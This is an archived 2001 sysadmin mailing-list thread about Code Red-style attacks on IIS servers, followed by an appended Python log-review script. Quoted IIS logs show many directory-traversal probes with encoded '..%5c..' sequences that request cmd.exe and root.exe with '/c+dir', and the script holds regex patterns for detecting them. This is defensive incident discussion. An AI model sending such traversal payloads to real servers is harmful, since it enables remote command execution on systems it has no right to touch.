To review the logfiles on your server, look under \WINNT\SYSTEM32\LogFiles
and probably W3svc1 or something similar. That's the folder holding most log
files.  Look for anything created today and make sure you open it with some
reader that doesn't lock the file from being written by other applications.
It'll keep being updated if you're reviewing it.

Feel free to contact me directly if you need more help.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]


-----Original Message-----
From: Laura Swartout [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:47 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


I'm new to IS admin. What logs should I be looking at? I apply all security
patches as they come out so I was not hit by CodeRed.

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Here is a site that has been hit
http://216.39.178.32

-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


CodeRed seems to have dwindled to nothing on my logs. But it's being
replaced with the EXACT same lines you have below, and they stay
consistent with the code red 2 methods of attacking the more local
subnets.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]


-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert


Yes. It seems to be systems I have previously monitored hitting me with
CodeRed attacks. I bet someone is activating all of their children.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]


-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert


All my public facing web servers at home and at my office have shown a
huge continuous hacking activity. Has anyone seen similar? I fear this
may be code red related or automated. Please comment if you have seen
similar. Here is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
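As an added example (not from any poster in this thread), a small Python script that applies Jason's advice to review the current log file: it parses records in the native IIS log format shown in xylog's excerpt, flags the cmd.exe / root.exe / encoded-traversal probes, groups them by source address, and separates the 404/500 failures from any probe that was answered with a 200, which is the case that needs a closer look rather than just a block at the firewall. The sample records are constructed to mirror the excerpt, and the probe patterns are mine, not a vendor signature.

```python
import re
from collections import Counter

# Constructed sample in the native IIS log format used in the excerpt above.
# Field order: client IP, user, date, time, service, server name, server IP,
# time taken, bytes sent, bytes received, HTTP status, Win32 status, method,
# URI stem, URI query.  Each record ends with a trailing comma.
SAMPLE_LOG = """\
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
"""

FIELDS = ("client_ip", "user", "date", "time", "service", "server", "server_ip",
          "time_taken", "bytes_sent", "bytes_recv", "status", "win32_status",
          "method", "uri_stem", "uri_query")

# Indicators taken from the excerpt: a request for the command shell, for the
# root.exe copy left behind by earlier worms, or an encoded "..\" / "../"
# (the mangled "..Á.." sequences in the mail are non-ASCII bytes in the path).
PROBE_PATTERNS = (
    re.compile(r"/cmd\.exe$", re.I),
    re.compile(r"/root\.exe$", re.I),
    re.compile(r"\.\.(%5c|%2f|\\|[^\x00-\x7f])", re.I),
)

def parse_iis_line(line):
    """Split one record into a dict keyed by FIELDS; None if it is not a record."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",")]
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def is_probe(rec):
    """True when the requested path matches any probe indicator."""
    return any(p.search(rec["uri_stem"]) for p in PROBE_PATTERNS)

def summarize_probes(log_text):
    """Group probe records by source IP: number of hits and HTTP status counts."""
    summary = {}
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None or not is_probe(rec):
            continue
        e = summary.setdefault(rec["client_ip"], {"hits": 0, "status": Counter()})
        e["hits"] += 1
        e["status"][rec["status"]] += 1
    return summary

def successful_probes(summary):
    """IPs whose probe got a 200: those hosts reached a shell, so treat as an incident."""
    return sorted(ip for ip, e in summary.items() if e["status"]["200"])
```

Run it against today's file from \WINNT\SYSTEM32\LogFiles\W3SVCn with `summarize_probes(open(path).read())`; an empty list from `successful_probes` means every probe in the file failed (404, or 500 with Win32 status 87).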



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential:  This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential,
and are intended solely for the use of the individual or entity to whom
this e-mail is addressed. If you are not one of the named recipient(s)
or otherwise have reason to believe that you have received this message
in error, please notify the sender at the above e-mail address and
delete this message immediately from your computer.  Any other use,
retention, dissemination, forwarding, printing or copying of this e-mail
is strictly prohibited.